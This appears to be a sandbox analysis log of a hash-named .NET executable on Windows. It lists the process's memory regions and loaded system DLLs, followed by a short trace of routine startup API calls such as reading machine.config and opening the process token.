entry_point = 0x3c128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1812
start_va = 0x738a0000
end_va = 0x738dafff
monitored = 0
entry_point = 0x738a128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1813
start_va = 0xc50000
end_va = 0xcd1fff
monitored = 0
entry_point = 0xc519a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 1814
start_va = 0xc50000
end_va = 0xcd1fff
monitored = 0
entry_point = 0xc519a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 1815
start_va = 0x6eba0000
end_va = 0x6ec23fff
monitored = 0
entry_point = 0x6eba19a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 1816
start_va = 0x4fe0000
end_va = 0x51cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004fe0000"
filename = ""
Region:
id = 1817
start_va = 0x51d0000
end_va = 0x520ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000051d0000"
filename = ""
Region:
id = 1818
start_va = 0x6b1b0000
end_va = 0x6b753fff
monitored = 1
entry_point = 0x6b73b692
region_type = mapped_file
name = "system.windows.forms.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.windows.forms\\v4.0_4.0.0.0__b77a5c561934e089\\system.windows.forms.dll")
Region:
id = 1819
start_va = 0x3a0000
end_va = 0x3a1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003a0000"
filename = ""
Region:
id = 1820
start_va = 0x739f0000
end_va = 0x73a02fff
monitored = 0
entry_point = 0x739f1d3f
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")
Region:
id = 1821
start_va = 0x3c0000
end_va = 0x3c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui")
Region:
id = 1822
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1823
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1832
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1833
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1834
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 1838
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1841
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1842
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 1843
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 1844
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1845
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1846
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1847
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1848
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1849
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1860
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1861
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1862
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 1863
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 1864
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 1867
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 1869
start_va = 0x1090000
end_va = 0x118ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001090000"
filename = ""
Region:
id = 1875
start_va = 0x6ea90000
end_va = 0x6eb94fff
monitored = 1
entry_point = 0x6eac9680
region_type = mapped_file
name = "diasymreader.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\diasymreader.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\diasymreader.dll")
Region:
id = 1926
start_va = 0xc70000
end_va = 0xcaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c70000"
filename = ""
Region:
id = 1927
start_va = 0x5090000
end_va = 0x518ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005090000"
filename = ""
Region:
id = 1928
start_va = 0x51c0000
end_va = 0x51cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000051c0000"
filename = ""
Region:
id = 1929
start_va = 0x747a0000
end_va = 0x747adfff
monitored = 0
entry_point = 0x747a1235
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll")
Region:
id = 1930
start_va = 0x7efaa000
end_va = 0x7efacfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efaa000"
filename = ""
Region:
id = 1931
start_va = 0xcb0000
end_va = 0xceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000cb0000"
filename = ""
Region:
id = 1932
start_va = 0xee0000
end_va = 0xf1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ee0000"
filename = ""
Region:
id = 1933
start_va = 0x5280000
end_va = 0x537ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005280000"
filename = ""
Region:
id = 1934
start_va = 0x5490000
end_va = 0x558ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005490000"
filename = ""
Region:
id = 1935
start_va = 0x7efa4000
end_va = 0x7efa6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa4000"
filename = ""
Region:
id = 1936
start_va = 0x7efa7000
end_va = 0x7efa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa7000"
filename = ""
Region:
id = 2072
start_va = 0x500000
end_va = 0x53ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000500000"
filename = ""
Region:
id = 2073
start_va = 0x660000
end_va = 0x69ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000660000"
filename = ""
Region:
id = 2074
start_va = 0xcf0000
end_va = 0xd2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000cf0000"
filename = ""
Region:
id = 2075
start_va = 0x5600000
end_va = 0x56fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005600000"
filename = ""
Region:
id = 2076
start_va = 0x7ef3d000
end_va = 0x7ef3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef3d000"
filename = ""
Region:
id = 2077
start_va = 0x7efa1000
end_va = 0x7efa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa1000"
filename = ""
Region:
id = 2078
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 2079
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 2080
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 2081
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 2082
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 2083
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2084
start_va = 0xe70000
end_va = 0xed1fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorrc.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll")
Region:
id = 2085
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 2086
start_va = 0x3e0000
end_va = 0x3e4fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003e0000"
filename = ""
Region:
id = 2087
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2088
start_va = 0x11d0000
end_va = 0x120ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000011d0000"
filename = ""
Region:
id = 2089
start_va = 0x1330000
end_va = 0x136ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001330000"
filename = ""
Region:
id = 2090
start_va = 0x7ef3a000
end_va = 0x7ef3cfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef3a000"
filename = ""
Region:
id = 2091
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2092
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2093
start_va = 0x4ff0000
end_va = 0x502ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ff0000"
filename = ""
Region:
id = 2094
start_va = 0x5710000
end_va = 0x580ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005710000"
filename = ""
Region:
id = 2095
start_va = 0x7ef37000
end_va = 0x7ef39fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef37000"
filename = ""
Region:
id = 2096
start_va = 0x440000
end_va = 0x44ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000440000"
filename = ""
Region:
id = 2097
start_va = 0x450000
end_va = 0x45ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000450000"
filename = ""
Region:
id = 2098
start_va = 0x450000
end_va = 0x45ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000450000"
filename = ""
Region:
id = 2099
start_va = 0x460000
end_va = 0x46ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000460000"
filename = ""
Region:
id = 2100
start_va = 0x3f0000
end_va = 0x3f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 2101
start_va = 0x440000
end_va = 0x446fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 2102
start_va = 0x3f0000
end_va = 0x3f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 2103
start_va = 0x440000
end_va = 0x446fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 2104
start_va = 0x3f0000
end_va = 0x3f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 2105
start_va = 0x3f0000
end_va = 0x3f6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 2106
start_va = 0x3f0000
end_va = 0x3f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 2107
start_va = 0x3f0000
end_va = 0x3f6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 2108
start_va = 0x3f0000
end_va = 0x3f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 2109
start_va = 0x3f0000
end_va = 0x3f6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 2110
start_va = 0x440000
end_va = 0x458fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000440000"
filename = ""
Region:
id = 2111
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2112
start_va = 0x460000
end_va = 0x46ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000460000"
filename = ""
Region:
id = 2113
start_va = 0x470000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000470000"
filename = ""
Region:
id = 2114
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2115
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2116
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2117
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2118
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2119
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2120
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2121
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2122
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2123
start_va = 0x75950000
end_va = 0x75954fff
monitored = 0
entry_point = 0x75951438
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")
Region:
id = 2124
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2125
start_va = 0x460000
end_va = 0x46ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000460000"
filename = ""
Region:
id = 2126
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2127
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2128
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2129
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2130
start_va = 0x3f0000
end_va = 0x3f2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003f0000"
filename = ""
Region:
id = 2131
start_va = 0x460000
end_va = 0x46ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000460000"
filename = ""
Region:
id = 2132
start_va = 0x470000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000470000"
filename = ""
Region:
id = 2133
start_va = 0x480000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 2134
start_va = 0x490000
end_va = 0x49ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000490000"
filename = ""
Region:
id = 2135
start_va = 0x470000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000470000"
filename = ""
Region:
id = 2136
start_va = 0x470000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000470000"
filename = ""
Region:
id = 2137
start_va = 0x4c30000
end_va = 0x4c6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c30000"
filename = ""
Region:
id = 2138
start_va = 0x4cc0000
end_va = 0x4cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cc0000"
filename = ""
Region:
id = 2139
start_va = 0x58f0000
end_va = 0x59effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000058f0000"
filename = ""
Region:
id = 2140
start_va = 0x7ef34000
end_va = 0x7ef36fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef34000"
filename = ""
Region:
id = 2141
start_va = 0x5210000
end_va = 0x524ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005210000"
filename = ""
Region:
id = 2142
start_va = 0x5b50000
end_va = 0x5c4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005b50000"
filename = ""
Region:
id = 2143
start_va = 0x7ef31000
end_va = 0x7ef33fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef31000"
filename = ""
Region:
id = 2147
start_va = 0x75960000
end_va = 0x75994fff
monitored = 0
entry_point = 0x7596145d
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")
Region:
id = 2148
start_va = 0x76960000
end_va = 0x76965fff
monitored = 0
entry_point = 0x76961782
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")
Region:
id = 2150
start_va = 0x747e0000
end_va = 0x7481bfff
monitored = 0
entry_point = 0x747e145d
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")
Region:
id = 2151
start_va = 0x747d0000
end_va = 0x747d4fff
monitored = 0
entry_point = 0x747d15df
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll")
Region:
id = 2153
start_va = 0x747c0000
end_va = 0x747c5fff
monitored = 0
entry_point = 0x747c1673
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll")
Region:
id = 2159
start_va = 0x8b0000
end_va = 0x8effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008b0000"
filename = ""
Region:
id = 2160
start_va = 0x5a10000
end_va = 0x5b0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005a10000"
filename = ""
Region:
id = 2161
start_va = 0x7ef2e000
end_va = 0x7ef30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef2e000"
filename = ""
Region:
id = 2168
start_va = 0x480000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 2169
start_va = 0x4b10000
end_va = 0x4bcffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")
Region:
id = 2170
start_va = 0x480000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 2171
start_va = 0x480000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 2173
start_va = 0x480000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 2174
start_va = 0x480000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 2175
start_va = 0x490000
end_va = 0x49ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000490000"
filename = ""
Region:
id = 2176
start_va = 0x4e0000
end_va = 0x4effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 2177
start_va = 0x5380000
end_va = 0x53fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005380000"
filename = ""
Thread:
id = 17
os_tid = 0x5c0
[0158.508] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0160.058] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc1cf
[0160.059] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1ce
[0160.511] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config", nBufferLength=0x105, lpBuffer=0x28e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config", lpFilePart=0x0) returned 0x66
[0160.520] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x28e3f0 | out: phkResult=0x28e3f0*=0x0) returned 0x2
[0160.520] RegCloseKey (hKey=0x80000002) returned 0x0
[0160.738] GetCurrentProcess () returned 0xffffffff
[0160.739] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28ea2c | out: TokenHandle=0x28ea2c*=0x40) returned 1
[0160.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x28e4e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e
[0160.747] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x28ea24 | out: lpFileInformation=0x28ea24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1
[0160.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x28e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0160.751] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x28ea2c | out: lpFileInformation=0x28ea2c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1
[0160.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x28e44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0160.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e964) returned 1
[0160.755] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1f0
[0160.755] GetFileType (hFile=0x1f0) returned 0x1
[0160.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e960) returned 1
[0160.756] GetFileType (hFile=0x1f0) returned 0x1
